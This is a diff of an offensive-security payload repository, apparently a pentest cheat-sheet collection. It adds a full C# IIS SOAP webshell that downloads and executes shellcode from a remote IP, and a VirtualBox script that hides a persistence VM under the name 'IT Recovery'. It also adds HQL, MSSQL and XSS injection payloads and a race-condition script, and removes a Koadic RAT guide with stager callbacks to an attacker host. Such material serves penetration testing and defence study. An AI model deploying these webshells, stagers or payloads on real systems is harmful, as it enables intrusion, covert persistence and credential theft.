 Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe
 # perform a silent install and avoid creating desktop and quick launch icons
 VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0
 # in \Program Files\Oracle\VirtualBox\VBoxManage.exe
 # Disabling notifications
 .\VBoxManage.exe setextradata global GUI/SuppressMessages "all" 
 # Download the Virtual machine disk
 Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd
 # Create a new VM
 $vmname = "IT Recovery"
 .\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register
 # Add a network card in NAT mode
 .\VBoxManage.exe modifyvm $vmname --ioapic on  # required for 64bit
 .\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128
 .\VBoxManage.exe modifyvm $vmname --nic1 nat
 .\VBoxManage.exe modifyvm $vmname --audio none
 .\VBoxManage.exe modifyvm $vmname --graphicscontroller vmsvga
 .\VBoxManage.exe modifyvm $vmname --description "Shadowbunny"
 # Mount the VHD file
 .\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata
 .\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0
 # Start the VM
 .\VBoxManage.exe startvm $vmname –type headless 
 # optional - adding a shared folder
 # require: VirtualBox Guest Additions
 .\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount
 # then mount the folder in the VM
 sudo mkdir /mnt/c
 sudo mount -t vboxsf shadow_c /mnt/c
 ```
 ## Domain
 ### User Certificate
@ -454,3 +552,4 @@ kerberos::tgt
 * [Persistence – Image File Execution Options Injection - @netbiosX](https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/)
 * [Persistence – Registry Run Keys - @netbiosX](https://pentestlab.blog/2019/10/01/persistence-registry-run-keys/)
 * [Golden Certificate - NOVEMBER 15, 2021](https://pentestlab.blog/2021/11/15/golden-certificate/)
 * [Beware of the Shadowbunny - Using virtual machines to persist and evade detections - Sep 23, 2020 - wunderwuzzi](https://embracethered.com/blog/posts/2020/shadowbunny-virtual-machine-red-teaming-technique/)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -1,123 +0,0 @@
 # Koadic C3 COM Command & Control - JScript RAT
 > Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire.
 ## Installation
 ```powershell
 git clone https://github.com/zerosum0x0/koadic
 git submodule init
 git submodule update
 pip2.7 install -r requirements.txt --user
 python2.7 koadic
 ```
 ## Set a listener
 ```powershell
 use stager/js/mshta
 set LHOST 192.168.1.19
 set SRVPORT 4444
 run
 [>] mshta http://192.168.1.19:4444/6DX7f
 ```
 ```powershell
 use stager/js/wmic
 set LHOST 192.168.1.19
 set SRVPORT 4444
 run
 [>] wmic os get /FORMAT:"http://192.168.1.19:4444/lQGx5.xsl"
 ```
 ### Stagers
 Stagers hook target zombies and allow you to use implants.
 Module | Description
 --------|------------
 stager/js/mshta | serves payloads using MSHTA.exe HTML Applications
 stager/js/regsvr | serves payloads using regsvr32.exe COM+ scriptlets
 stager/js/wmic | serves payloads using WMIC XSL
 stager/js/rundll32_js | serves payloads using rundll32.exe
 stager/js/disk | serves payloads using files on disk
 ## List zombies and interact with them
 ```powershell
 (koadic: sta/js/wmic)$ zombies
        ID   IP              STATUS  LAST SEEN
        ---  ---------       ------- ------------
        0    192.168.1.30    Alive   2018-10-04 17:07:12
 (koadic: sta/js/wmic)$ zombies 0
        ID:                     0
        Status:                 Alive
        First Seen:             2018-10-04 17:05:00
        Last Seen:              2018-10-04 17:14:42
        IP:                     192.168.1.30
        User:                   DESKTOP-68URA9U\CrashWin
        [...]
        Elevated:               No
        [...]
 ```
 Interact with `zombies zombie_id`, get a shell with `cmdshell zombie_id`.
 ```powershell
 [koadic: ZOMBIE 0 (192.168.1.30) - C:\Users\CrashWin]> whoami
 [*] Zombie 0: Job 1 (implant/manage/exec_cmd) created.
 [+] Zombie 0: Job 1 (implant/manage/exec_cmd) completed.
 Result for `cd C:\Users\CrashWin & whoami`:
 desktop-68ura9u\crashwin
 ```
 ## Use an implant
 Select an implant with `use module`, then fill the `info` with `set INFO value`, finally start the module with `run`.
 ```powershell
 (koadic: sta/js/mshta)$ use implant/phish/password_box
 (koadic: imp/phi/password_box)$ set ZOMBIE 1
 (koadic: imp/phi/password_box)$ run
 Input contents:
 MyStrongPassword123!
 ```
 ### Implants
 Implants start jobs on zombies.
 Module | Description
 --------|------------
 implant/elevate/bypassuac_eventvwr | Uses enigma0x3's eventvwr.exe exploit to bypass UAC on Windows 7, 8, and 10.
 implant/elevate/bypassuac_sdclt | Uses enigma0x3's sdclt.exe exploit to bypass UAC on Windows 10.
 implant/fun/zombie | Maxes volume and opens The Cranberries YouTube in a hidden window.
 implant/fun/voice | Plays a message over text-to-speech.
 implant/gather/clipboard | Retrieves the current content of the user clipboard.
 implant/gather/enum_domain_info | Retrieve information about the Windows domain.
 implant/gather/hashdump_sam | Retrieves hashed passwords from the SAM hive.
 implant/gather/hashdump_dc | Domain controller hashes from the NTDS.dit file.
 implant/gather/user_hunter | Locate users logged on to domain computers (using Dynamic Wrapper X).
 implant/inject/mimikatz_dynwrapx | Injects a reflective-loaded DLL to run powerkatz.dll (using Dynamic Wrapper X).
 implant/inject/mimikatz_dotnet2js | Injects a reflective-loaded DLL to run powerkatz.dll (@tirannido DotNetToJS).
 implant/inject/shellcode_excel | Runs arbitrary shellcode payload (if Excel is installed).
 implant/manage/enable_rdesktop | Enables remote desktop on the target.
 implant/manage/exec_cmd | Run an arbitrary command on the target, and optionally receive the output.
 implant/phishing/password_box | Prompt a user to enter their password.
 implant/pivot/stage_wmi | Hook a zombie on another machine using WMI.
 implant/pivot/exec_psexec | Run a command on another machine using psexec from sysinternals.
 implant/scan/tcp | Uses HTTP to scan open TCP ports on the target zombie LAN.
 implant/utils/download_file | Downloads a file from the target zombie.
 implant/utils/multi_module | Run a number of implants in succession.
 implant/utils/upload_file | Uploads a file from the listening server to the target zombies.
 ## References
 - [Pentestlab - koadic](https://pentestlab.blog/tag/koadic/)
 - [zerosum0x0 Github - koadic](https://github.com/zerosum0x0/koadic)
--- a/Resources/Windows
+++ b/Resources/Windows
@ -14,6 +14,7 @@
    * [Default Writeable Folders](#default-writeable-folders)
 * [EoP - Looting for passwords](#eop---looting-for-passwords)
    * [SAM and SYSTEM files](#sam-and-system-files)
    * [LAPS Settings](#laps-settings)
    * [HiveNightmare](#hivenightmare)
    * [Search for file contents](#search-for-file-contents)
    * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
@ -394,6 +395,15 @@ samdump2 SYSTEM SAM -o sam.txt
 Either crack it with `john -format=NT /root/sam.txt` or use Pass-The-Hash.
 ### LAPS Settings
 Extract `HKLM\Software\Policies\Microsoft Services\AdmPwd` from Windows Registry.
 * LAPS Enabled: AdmPwdEnabled
 * LAPS Admin Account Name: AdminAccountName
 * LAPS Password Complexity: PasswordComplexity
 * LAPS Password Length: PasswordLength
 * LAPS Expiration Protection Enabled: PwdExpirationProtectionEnabled
 ### HiveNightmare
--- a/Condition/README.md
+++ b/Condition/README.md
@ -41,9 +41,40 @@
 3. Now set the external HTTP header x-request: %s - :warning: This is needed by the turbo intruder
 4. Click "Attack"
 ## Turbo Intruder 2 Requests Examples
 This follwoing template can use when use have to send race condition of request2 immediately after send a request1 when the window may only be a few milliseconds.
 ```python
 def queueRequests(target, wordlists): 
    engine = RequestEngine(endpoint=target.endpoint, 
                           concurrentConnections=30, 
                           requestsPerConnection=100, 
                           pipeline=False 
                           ) 
    request1 = '''
 POST /target-URI-1 HTTP/1.1
 Host: <REDACTED>
 Cookie: session=<REDACTED>
 parameterName=parameterValue
    ''' 
    request2 = '''
 GET /target-URI-2 HTTP/1.1
 Host: <REDACTED>
 Cookie: session=<REDACTED>
    '''
    engine.queue(request1, gate='race1')
    for i in range(30): 
        engine.queue(request2, gate='race1') 
    engine.openGate('race1') 
    engine.complete(timeout=60) 
 def handleResponse(req, interesting): 
    table.add(req)
 ```
 ## References
 * [Race Condition allows to redeem multiple times gift cards which leads to free "money" - @muon4](https://hackerone.com/reports/759247)
 * [Turbo Intruder: Embracing the billion-request attack - James Kettle | 25 January 2019](https://portswigger.net/research/turbo-intruder-embracing-the-billion-request-attack)
-* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
+* [Race Condition Bug In Web App: A Use Case - Mandeep Jadon](https://medium.com/@ciph3r7r0ll/race-condition-bug-in-web-app-a-use-case-21fd4df71f0e)
--- a/Injection/HQL
+++ b/Injection/HQL
@ -1,11 +1,18 @@
 # Hibernate Query Language Injection 
 > Hibernate ORM (Hibernate in short) is an object-relational mapping tool for the Java programming language. It provides a framework for mapping an object-oriented domain model to a relational database. - Wikipedia
 ## Summary
 * [HQL Comments](#hql-comments)
 * [HQL List Columns](#hql-list-columns)
 * [HQL Error Based](#hql-error-based)
 * [Single Quote Escaping](#single-quote-escaping)
 * [$-quoted strings](#--quoted-strings)
 * [DBMS Magic functions](#dbms-magic-functions)
 * [Unicode](#unicode)
 * [Java constants](#java-constants)
 * [Methods by DBMS](#methods-by-dbms)
 * [References](#references)
 ## HQL Comments
@ -49,10 +56,107 @@ select blogposts0_.id as id18_, blogposts0_.author as author18_, blogposts0_.pro
 :warning: **HQL does not support UNION queries**
 ## Single Quote Escaping
 Method works for MySQL DBMS which escapes SINGLE QUOTES in strings with SLASH `\'`.
 In HQL SINGLE QUOTES is escaped in strings by doubling `''`.
 ```
 'abc\''or 1=(select 1)--'
 ```
 In HQL it is a string, in MySQL it is a string and additional SQL expression.
 ## $-quoted strings
 Method works for DBMS which allow DOLLAR-QUOTED strings in SQL expressions: PostgreSQL, H2.
 Hibernate ORM allows identifiers starting with `$$`.
 ```
 $$='$$=concat(chr(61),chr(39)) and 1=1--'
 ```
 ## DBMS Magic functions
 Method works for DBMS which have MAGIC FUNCTIONS which evaluate SQL expression in string parameter: PostgreSQL, Oracle.
 Hibernate allows to specify any function name in HQL expression.
 PostgreSQL has built-in function `query_to_xml('Arbitrary SQL')`.
 ```
 array_upper(xpath('row',query_to_xml('select 1 where 1337>1', true, false,'')),1)
 ```
 Oracle has built-in function `DBMS_XMLGEN.getxml('SQL')`
 ```
 NVL(TO_CHAR(DBMS_XMLGEN.getxml('select 1 where 1337>1')),'1')!='1'
 ```
 ## Unicode
 Method works for DBMS which allow UNICODE delimiters (Ex. U+00A0) between SQL tokens: Microsoft SQL Server, H2.
 In Microsoft SQL SERVER `SELECT LEN([U+00A0](select[U+00A0](1))` works the same as `SELECT LEN((SELECT(1)))`;
 HQL allows UNICODE symbols in identifiers (function or parameter names).
 ```
 SELECT p FROM hqli.persistent.Post p where p.name='dummy' or 1<LEN( (select top 1 name from users)) or '1'='11'
 ```
 ## Java constants
 Method works for most DBMS (does not work for MySQL).
 Hibernate resolves Java public static fields (Java constants) in HQL queries:
 - Class with Java constant must be in classpath
 - Ex. `java.lang.Character.SIZE` is resolved to 16
 - String or char constants are additionally surrounded by single quotes
 To use JAVA CONSTANTS method we need special char or  string fields declared in classes or interfaces on classpath.
 ```java
 public class Constants {
    public static final String S_QUOTE = "'";
    public static final String HQL_PART = "select * from Post where name = '";
    public static final char C_QUOTE_1 = '\'';
    public static final char C_QUOTE_2 = '\047';
    public static final char C_QUOTE_3 = 39;
    public static final char C_QUOTE_4 = 0x27;
    public static final char C_QUOTE_5 = 047;
 }
 ```
 Some usable constants in well-known Java libraries:
 ```
 org.apache.batik.util.XMLConstants.XML_CHAR_APOS         [ Apache Batik ]
 com.ibm.icu.impl.PatternTokenizer.SINGLE_QUOTE           [ ICU4J ]
 jodd.util.StringPool.SINGLE_QUOTE                        [ Jodd ]
 ch.qos.logback.core.CoreConstants.SINGLE_QUOTE_CHAR      [ Logback ]
 cz.vutbr.web.csskit.OutputUtil.STRING_OPENING            [ jStyleParser ]
 com.sun.java.help.impl.DocPConst.QUOTE                   [ JavaHelp ]
 org.eclipse.help.internal.webapp.utils.JSonHelper.QUOTE  [ EclipseHelp ]
 ```
 ```
 dummy' and hqli.persistent.Constants.C_QUOTE_1*X('<>CHAR(41) and (select count(1) from sysibm.sysdummy1)>0 --')=1 and '1'='1
 ```
 ## Methods by DBMS
 ![image](https://user-images.githubusercontent.com/16578570/163428666-a22105a8-287c-4997-8aef-8f372a1b86e9.png)
 ## References
 * [HQL for pentesters - February 12, 2014 - Philippe Arteau](https://blog.h3xstream.com/2014/02/hql-for-pentesters.html)
 * [How to put a comment into HQL (Hibernate Query Language)? - Thomas Bratt](https://stackoverflow.com/questions/3196975/how-to-put-a-comment-into-hql-hibernate-query-language)
 * [HQL : Hyperinsane Query Language - 04/06/2015 - Renaud Dubourguais](https://www.synacktiv.com/ressources/hql2sql_sstic_2015_en.pdf)
 * [ORM2Pwn: Exploiting injections in Hibernate ORM - Nov 26, 2015 - Mikhail Egorov](https://www.slideshare.net/0ang3el/orm2pwn-exploiting-injections-in-hibernate-orm)
 * [New Methods for Exploiting ORM Injections in Java Applications - HITBSecConf2016 - Mikhail Egorov - Sergey Soldatov](https://conference.hitb.org/hitbsecconf2016ams/materials/D2T2%20-%20Mikhail%20Egorov%20and%20Sergey%20Soldatov%20-%20New%20Methods%20for%20Exploiting%20ORM%20Injections%20in%20Java%20Applications.pdf)
 * [HQL Injection Exploitation in MySQL - July 18, 2019 - Olga Barinova](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/hql-injection-exploitation-in-mysql/)
--- a/Injection/MSSQL
+++ b/Injection/MSSQL
@ -23,6 +23,7 @@
    * [MSSQL UNC path](#mssql-unc-path)
 * [MSSQL Make user DBA](#mssql-make-user-dba-db-admin)
 * [MSSQL Trusted Links](#mssql-trusted-links)
 * [MSSQL List permissions](#mssql-list-permissions)
 ## MSSQL Comments
@ -96,7 +97,7 @@ SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins (Nee
 MSSQL 2005
 SELECT name, password_hash FROM master.sys.sql_logins
-SELECT name + ‘-’ + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
+SELECT name + '-' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins
 ```
 ## MSSQL Union Based
@ -297,6 +298,33 @@ EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '')
 EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2"
 ```
 ## List permissions
 Listing effective permissions of current user on the server.
 ```sql
 SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 
 ```
 Listing effective permissions of current user on the database.
 ```sql
 SELECT * FROM fn_my_permissions (NULL, 'DATABASE');
 ```
 Listing effective permissions of current user on a view.
 ```
 SELECT * FROM fn_my_permissions('Sales.vIndividualCustomer', 'OBJECT') ORDER BY subentity_name, permission_name; 
 ```
 Check if current user is a member of the specified server role.
 ```sql
 -- possible roles: sysadmin, serveradmin, dbcreator, setupadmin, bulkadmin, securityadmin, diskadmin, public, processadmin
 SELECT is_srvrolemember('sysadmin');
 ```
 ## References
 * [Pentest Monkey - mssql-sql-injection-cheat-sheet](http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet)
@ -306,3 +334,5 @@ EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT
 * [DAFT: Database Audit Framework & Toolkit - NetSPI](https://github.com/NetSPI/DAFT)
 * [SQL Server UNC Path Injection Cheatsheet - nullbind](https://gist.github.com/nullbind/7dfca2a6309a4209b5aeef181b676c6e)
 * [Full MSSQL Injection PWNage - ZeQ3uL && JabAv0C - 28 January 2009](https://www.exploit-db.com/papers/12975)
 * [Microsoft - sys.fn_my_permissions (Transact-SQL)](https://docs.microsoft.com/en-us/sql/relational-databases/system-functions/sys-fn-my-permissions-transact-sql?view=sql-server-ver15)
 * [Microsoft - IS_SRVROLEMEMBER (Transact-SQL)](https://docs.microsoft.com/en-us/sql/t-sql/functions/is-srvrolemember-transact-sql?view=sql-server-ver15)
--- a/Forgery/README.md
+++ b/Forgery/README.md
@ -223,6 +223,12 @@ List:
 ① ② ③ ④ ⑤ ⑥ ⑦ ⑧ ⑨ ⑩ ⑪ ⑫ ⑬ ⑭ ⑮ ⑯ ⑰ ⑱ ⑲ ⑳ ⑴ ⑵ ⑶ ⑷ ⑸ ⑹ ⑺ ⑻ ⑼ ⑽ ⑾ ⑿ ⒀ ⒁ ⒂ ⒃ ⒄ ⒅ ⒆ ⒇ ⒈ ⒉ ⒊ ⒋ ⒌ ⒍ ⒎ ⒏ ⒐ ⒑ ⒒ ⒓ ⒔ ⒕ ⒖ ⒗ ⒘ ⒙ ⒚ ⒛ ⒜ ⒝ ⒞ ⒟ ⒠ ⒡ ⒢ ⒣ ⒤ ⒥ ⒦ ⒧ ⒨ ⒩ ⒪ ⒫ ⒬ ⒭ ⒮ ⒯ ⒰ ⒱ ⒲ ⒳ ⒴ ⒵ Ⓐ Ⓑ Ⓒ Ⓓ Ⓔ Ⓕ Ⓖ Ⓗ Ⓘ Ⓙ Ⓚ Ⓛ Ⓜ Ⓝ Ⓞ Ⓟ Ⓠ Ⓡ Ⓢ Ⓣ Ⓤ Ⓥ Ⓦ Ⓧ Ⓨ Ⓩ ⓐ ⓑ ⓒ ⓓ ⓔ ⓕ ⓖ ⓗ ⓘ ⓙ ⓚ ⓛ ⓜ ⓝ ⓞ ⓟ ⓠ ⓡ ⓢ ⓣ ⓤ ⓥ ⓦ ⓧ ⓨ ⓩ ⓪ ⓫ ⓬ ⓭ ⓮ ⓯ ⓰ ⓱ ⓲ ⓳ ⓴ ⓵ ⓶ ⓷ ⓸ ⓹ ⓺ ⓻ ⓼ ⓽ ⓾ ⓿
 ```
 ### Bypass using unicode
 In some languages (.NET, Python 3) regex supports unicode by default.
 `\d` includes `0123456789` but also `๐๑๒๓๔๕๖๗๘๙`.
 ### Bypass filter_var() php function
 ```powershell
--- a/Files/Extension
+++ b/Files/Extension
@ -0,0 +1,55 @@
 <%@ WebService Language="C#" class="SoapStager"%>
 using System;
 using System.IO;
 using System.Web;
 using System.Web.Services;
 using System.Net;
 using System.Net.NetworkInformation;
 using System.Net.Security;
 // SRC: https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap
 // https://github.com/0xbad53c/webshells/tree/main/iis
 [WebService(Namespace = "http://microsoft.com/" ,Description ="SOAP Stager Webshell" , Name ="SoapStager")]
 [WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
 public class SoapStager : MarshalByRefObject
 {
 	private static Int32 MEM_COMMIT=0x1000;
 	private static IntPtr PAGE_EXECUTE_READWRITE=(IntPtr)0x40;
 	[System.Runtime.InteropServices.DllImport("kernel32")]
 	private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr,UIntPtr size,Int32 flAllocationType,IntPtr flProtect);
 	[System.Runtime.InteropServices.DllImport("kernel32")]
 	private static extern IntPtr CreateThread(IntPtr lpThreadAttributes,UIntPtr dwStackSize,IntPtr lpStartAddress,IntPtr param,Int32 dwCreationFlags,ref IntPtr lpThreadId);
    [System.ComponentModel.ToolboxItem(false)]
    [WebMethod]
    public string loadStage()
    {
        string Url = "http://10.90.255.52/beacon.bin"; //your IP and location of meterpreter or other raw shellcode
        byte[] rzjUFlLZh;
        IWebProxy defaultWebProxy = WebRequest.DefaultWebProxy;
        defaultWebProxy.Credentials = CredentialCache.DefaultCredentials;
        // in case of HTTPS
        using (WebClient webClient = new WebClient() { Proxy = defaultWebProxy })
        {
            ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072;
            ServicePointManager.ServerCertificateValidationCallback = new RemoteCertificateValidationCallback(delegate { return true; });
            webClient.UseDefaultCredentials = true;
            rzjUFlLZh = webClient.DownloadData(Url);
        }
        // Feel free to improve to PAGE_READWRITE & direct syscalls for more evasion
        IntPtr fvYV5t = VirtualAlloc(IntPtr.Zero,(UIntPtr)rzjUFlLZh.Length,MEM_COMMIT, PAGE_EXECUTE_READWRITE);
        System.Runtime.InteropServices.Marshal.Copy(rzjUFlLZh,0,fvYV5t,rzjUFlLZh.Length);
        IntPtr owlqRoQI_ms = IntPtr.Zero;
        IntPtr vnspR2 = CreateThread(IntPtr.Zero,UIntPtr.Zero,fvYV5t,IntPtr.Zero,0,ref owlqRoQI_ms);
        return "finished";
    }
 }
--- a/Files/README.md
+++ b/Files/README.md
@ -1,13 +1,12 @@
 # Upload
-Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
+> Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
 ## Summary
 * [Tools](#tools)
 * [Exploits](#exploits)
-    * [Defaults extensions](#defaults-extension)
+    * [Defaults extensions](#defaults-extensions)
    * [Other extensions](#other-extensions)
    * [Upload tricks](#upload-tricks)
    * [Filename vulnerabilities](#filename-vulnerabilities)
    * [Picture upload with LFI](#picture-upload-with-lfi)
@ -44,7 +43,7 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at
    .phtm
    .inc
    ```
-* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)`
+* ASP Server : `.asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0), shell.soap`
 * JSP : `.jsp, .jspx, .jsw, .jsv, .jspf`
 * Perl: `.pl, .pm, .cgi, .lib`
 * Coldfusion: `.cfm, .cfml, .cfc, .dbm`
@ -53,18 +52,19 @@ Uploaded files may pose a significant risk if not handled correctly. A remote at
 - Use double extensions : `.jpg.php`
 - Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): `.php.jpg`
- Mix uppercase and lowercase : `.pHp, .pHP5, .PhAr`
+- Random uppercase and lowercase : `.pHp, .pHP5, .PhAr`
 - Null byte (works well against `pathinfo()`)
-    * .php%00.gif
+    * `.php%00.gif`
-    * .php\x00.gif
+    * `.php\x00.gif`
-    * .php%00.png
+    * `.php%00.png`
-    * .php\x00.png
+    * `.php\x00.png`
-    * .php%00.jpg
+    * `.php%00.jpg`
-    * .php\x00.jpg
+    * `.php\x00.jpg`
 - Special characters
    * Multiple dots : `file.php......` , in Windows when a file is created with dots at the end those will be removed.
-    * Whitespace characters: `file.php%20`
+    * Whitespace characters: `file.php%20`, `file.php%0d%0a.jpg`
    * Right to Left Override (RTLO): `name.%E2%80%AEphp.jpg` will became `name.gpj.php`.
    * Slash: `file.php/`, `file.php.\`
 - Mime type, change `Content-Type : application/x-php` or `Content-Type : application/octet-stream` to `Content-Type : image/gif`
    * `Content-Type : image/gif`
    * `Content-Type : image/png`
@ -143,4 +143,5 @@ When a ZIP/archive file is automatically decompressed after the upload
 * [Encoding Web Shells in PNG IDAT chunks, 04-06-2012, phil](https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/)
 * [La PNG qui se prenait pour du PHP, 23 février 2014](https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/)
 * [File Upload restrictions bypass - Haboob Team](https://www.exploit-db.com/docs/english/45074-file-upload-restrictions-bypass.pdf)
-* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
+* [File Upload - Mahmoud M. Awali / @0xAwali](https://docs.google.com/presentation/d/1-YwXl9rhzSvvqVvE_bMZo2ab-0O5wRNTnzoihB9x6jI/edit#slide=id.ga2ef157b83_1_0)
 * [IIS - SOAP](https://red.0xbad53c.com/red-team-operations/initial-access/webshells/iis-soap)
--- a/Injection/README.md
+++ b/Injection/README.md
@ -663,6 +663,12 @@ You can bypass a single quote with &#39; in an on mousedown event handler
 Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
 http://www.geektools.com/cgi-bin/ipconv.cgi
 ```javascript
 <script>eval(atob("YWxlcnQoZG9jdW1lbnQuY29va2llKQ=="))<script>
 ```
 Base64 encoding your XSS payload with Linux command: IE. `echo -n "alert(document.cookie)" | base64` == `YWxlcnQoZG9jdW1lbnQuY29va2llKQ==`
 ### Bypass parenthesis for string
 ```javascript
@ -725,6 +731,7 @@ $ echo "<svg^Lonload^L=^Lalert(1)^L>" | xxd
 ```javascript
 <div id = "x"></div><script>alert(x.parentNode.parentNode.parentNode.location)</script>
 window["doc"+"ument"]
 ```
 ### Bypass using javascript inside a string
@ -1248,3 +1255,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
 - [Self Closing Script](https://twitter.com/PortSwiggerRes/status/1257962800418349056)
 - [Bypass < with ＜](https://hackerone.com/reports/639684)
 - [Bypassing Signature-Based XSS Filters: Modifying Script Code](https://portswigger.net/support/bypassing-signature-based-xss-filters-modifying-script-code)
--- a/Injection/XSS
+++ b/Injection/XSS
@ -157,6 +157,23 @@ AngularJS (without `'` single and `"` double quotes) by [@Viren](https://twitter
 {{x=valueOf.name.constructor.fromCharCode;constructor.constructor(x(97,108,101,114,116,40,49,41))()}}
 ```
 AngularJS (without `'` single and `"` double quotes and `constructor` string)
 ```javascript
 {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
 ```
 ```javascript
 {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
 ```
 ```javascript
 {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCharCode(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
 ```
 ```javascript
 {{x=767015343;y=50986827;a=x.toString(36)+y.toString(36);a.sub.call.call({}[a].getOwnPropertyDescriptor(a.sub.__proto__,a).value,0,toString()[a].fromCodePoint(112,114,111,109,112,116,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))()}}
 ```
 ### Blind XSS